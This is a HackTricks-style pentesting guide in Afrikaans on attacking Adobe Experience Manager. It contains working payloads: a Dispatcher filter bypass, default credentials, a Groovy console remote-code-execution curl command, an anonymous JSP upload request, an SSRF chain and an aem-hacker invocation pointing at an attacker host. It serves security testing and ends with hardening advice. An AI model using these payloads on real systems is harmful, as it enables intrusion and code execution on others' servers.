AEM (Adobe Experience Manager) Pentesting
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die š¬ Discord groep of die telegram groep of volg ons op Twitter š¦ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Adobe Experience Manager (AEM, deel van die Adobe Experience Cloud) is ān ondernemings CMS wat bo-op Apache Sling/Felix (OSGi) en ān Java Content Repository (JCR) loop. Vanuit ān aanvaller se perspektief stel AEM-instansies baie dikwels gevaarlike ontwikkelings eindpunte, swak Dispatcher-reĆ«ls, standaard akrediteer en ān lang stert van CVEās bloot wat elke kwartaal reggestel word.
Die kontrolelys hieronder fokus op extern bereikbare (unauth) aanval oppervlak wat voortdurend in werklike betrokkenhede verskyn (2022-2025).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Ander vinnige aanwysers:
/etc.clientlibs/statiese pad teenwoordig (gee JS/CSS terug)./libs/granite/core/content/login.htmlaanmeldblad met die āAdobe Experience Managerā banier.</script><!--/* CQ */-->kommentaar aan die onderkant van HTML.
2. Hoƫ-waarde nie-geoutentiseerde eindpunte
| Pad | Wat jy kry | Aantekeninge |
|---|---|---|
/.json, /.1.json | JCR knope via DefaultGetServlet | Dikwels geblokkeer, maar Dispatcher omseiling (sien hieronder) werk. |
/bin/querybuilder.json?path=/ | QueryBuilder API | Lek van bladboom, interne pades, gebruikersname. |
/system/console/status-*, /system/console/bundles | OSGi/Felix konsole | 403 per standaard; as blootgestel & akrediteer gevind ā bundel-oplaai RCE. |
/crx/packmgr/index.jsp | Pakketbestuurder | Laat geoutentiseerde inhoudspakkette toe ā JSP payload oplaai. |
/etc/groovyconsole/** | AEM Groovy Konsole | As blootgestel ā arbitrĆŖre Groovy / Java uitvoering. |
/libs/cq/AuditlogSearchServlet.json | Oudit logs | Inligtingsontsluiting. |
/libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS-vak. |
Dispatcher omseiling truuk
Meeste produksie-webwerwe sit agter die Dispatcher (omgekeerde proxy). Sy filterreĆ«ls kan omseil word deur ān toegelate statiese uitbreiding na ān puntkomma of geĆ«nkodeerde nuwe lyn by te voeg:
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
ān Enkele versoek soos hierbo openbaar dikwels gebruikersprofielknope met e-posadresse. P-T Partners het goeie leiding oor hierdie swakheid gepubliseer. ćć
3. Algemene miskonfigurasies (nog steeds lewendig in 2025)
- Anonieme POST servlet ā
POST /.jsonmet:operation=importlaat jou toe om nuwe JCR knope te plant. Om*.jsonPOST in die Dispatcher te blokkeer, los dit op. ćć - WĆŖreldleesbare gebruikersprofiele ā standaard ACL verleen
jcr:readop/home/users/**/profile/*aan almal. - Standaard akrediteer ā
admin:admin,author:author,replication:replication. - WCMDebugFilter geaktiveer ā weerspieĆ«lde XSS via
?debug=layout(CVE-2016-7882, steeds gevind op erfenis 6.4 installasies). - Groovy Console blootgestel ā afstandkode-uitvoering deur ān Groovy-skrip te stuur:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
4. Onlangse kwesbaarhede (dienspakket kadens)
| Kwartaal | CVE | Aangetas | Impak |
|---|---|---|---|
| Des 2024 | CVE-2024-43711 | 6.5.21 en vroeĆ«r | Onbehoorlike invoervalidasie ā Arbitraire kode-uitvoering (vereis lae-priv akker). ćć |
| Des 2024 | CVE-2024-43724/26 | 6.5.21 en vroeĆ«r | DOM / Gestoor XSS in Move Page Wizard. ćć |
| Des 2023 | CVE-2023-48452/68 | ⤠6.5.18 | DOM-gebaseerde XSS via vervaardigde URL. ćć |
| Des 2022 | CVE-2022-30683 | ⤠6.5.13 | Crypto ontwerpfout ā geheime ontsleuteling (benodig lae-priv akrediteer). ćć |
Kontroleer altyd die APSB bulletin wat ooreenstem met die kliƫnt se dienspakket en vra die nuutste 6.5.22 of Cloud Service 2024.11.
5. Exploitasiestukke
5.1 RCE via dispatcher omseiling + JSP opgelaai
As anonieme skryf moontlik is:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Now request /content/evil.jsp ā die JSP loop met die AEM proses gebruiker.
5.2 SSRF na RCE (histories < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py van aem-hacker outomatiseer die volle ketting. ćć
6. Gereedskap
- aem-hacker ā Switserse leĆ«r enumerasie skrip, ondersteun dispatcher omseiling, SSRF opsporing, standaard-kredens kontrole en meer.
python3 aem_hacker.py -u https://target --host attacker-ip
```ćć
* **Inhoud Brute-force** ā herhalend versoek `/_jcr_content.(json|html)` om verborge komponente te ontdek.
* **osgi-infect** ā laai kwaadwillige OSGi bundel op via `/system/console/bundles` as kredens beskikbaar is.
---
## 7. Versterking kontrolelys (vir jou verslag se aanbevelings)
1. Hou die instansie op die **nuutste kumulatiewe dienspakket** (soos van Jul 2025: 6.5.22).
2. Verwyder/roteer standaard rekeninge; afdwing SSO/SAML.
3. Versterk **Dispatcher filters** ā weier `;`, geĆ«nkodeerde nuwe reĆ«ls, en `*.json` of `*.querybuilder.json` vir anonieme gebruikers.
4. Deaktiveer of beskerm consoles (`/system/console`, `/crx/*`, `/etc/groovyconsole`) met IP toelaat-lists.
5. Pas die *Anonieme Toestemming Versterking* pakket toe wat deur Adobe gestuur is.
## Verwysings
* Adobe Security Bulletin APSB24-69 ā āVeiligheidsopdaterings vir Adobe Experience Manager (Des 2024)ā.
* 0ang3el ā aem-hacker hulpmiddel (GitHub).
> [!TIP]
> Leer en oefen AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer en oefen GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Leer en oefen Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Ondersteun HackTricks</summary>
>
> - Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
> - **Sluit aan by die** š¬ [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** š¦ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>
HackTricks

